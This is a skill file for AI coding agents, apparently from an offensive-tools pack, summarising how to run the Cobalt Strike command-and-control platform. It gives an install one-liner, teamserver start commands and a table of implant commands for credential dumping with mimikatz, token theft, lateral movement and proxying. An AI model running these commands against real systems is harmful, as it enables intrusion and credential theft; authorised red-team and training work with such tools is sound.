offensive-tools/c2/cobalt-strike/SKILL.md
Cobalt Strike: commercial adversary simulation platform with Beacon implant supporting HTTP/S, DNS, SMB, TCP, and Malleable C2 profiles. Use when operating professional red team engagements, simulating advanced threat groups, managing multi-operator teamserver infrastructure, or executing BOFs.
```
npx skillsauth add aeondave/malskill cobalt-strike
```
Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Commercial adversary simulation with Beacon implant.
```
./teamserver <ip> <password> [malleable-profile]
./cobaltstrike
```
| Command | Purpose |
|---------|---------|
| shell <cmd> | Run via cmd.exe |
| run <cmd> | Execute directly |
| powerpick <ps> | Unmanaged PowerShell |
| execute-assembly <dll> <args> | In-memory .NET execution |
| inline-execute <bof> | Execute BOF in Beacon |
| jump psexec <target> <listener> | Lateral movement via SMB |
| jump winrm64 <target> <listener> | Lateral via WinRM |
| steal_token <pid> | Token impersonation |
| mimikatz sekurlsa::logonpasswords | Kiwi credential dump |
| socks 1080 | SOCKS proxy |
| rportfwd <lp> <host> <rp> | Reverse port forward |
Malleable C2 profiles modify Beacon's network fingerprint. Key sections: `http-get`, `http-post`, `stage`, `process-inject`.
```
./c2lint malleable-profile.profile
```
| File | When to load |
|------|--------------|
| references/ | Aggressor Script, BOF development, Malleable profile examples |